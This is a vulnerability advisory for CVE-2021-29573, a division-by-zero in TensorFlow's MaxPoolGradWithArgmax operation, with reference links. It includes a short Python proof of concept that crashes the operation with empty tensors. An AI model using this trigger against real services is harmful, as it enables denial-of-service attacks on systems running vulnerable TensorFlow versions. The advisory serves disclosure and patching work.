CVE-2021-29573: Division by 0 in `MaxPoolGradWithArgmax`
(updated )
The implementation of tf.raw_ops.MaxPoolGradWithArgmax
is vulnerable to a division by 0:
import tensorflow as tf
input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
argmax = tf.constant([], shape=[0], dtype=tf.int64)
ksize = [1, 1, 1, 1]
strides = [1, 1, 1, 1]
tf.raw_ops.MaxPoolGradWithArgmax(
input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides,
padding='SAME', include_batch_in_index=False)
References
- github.com/advisories/GHSA-9vpm-rcf4-9wqw
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-501.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-699.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-210.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/376c352a37ce5a68b721406dc7e77ac4b6cf483d
- github.com/tensorflow/tensorflow/security/advisories/GHSA-9vpm-rcf4-9wqw
- nvd.nist.gov/vuln/detail/CVE-2021-29573
Detect and mitigate CVE-2021-29573 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →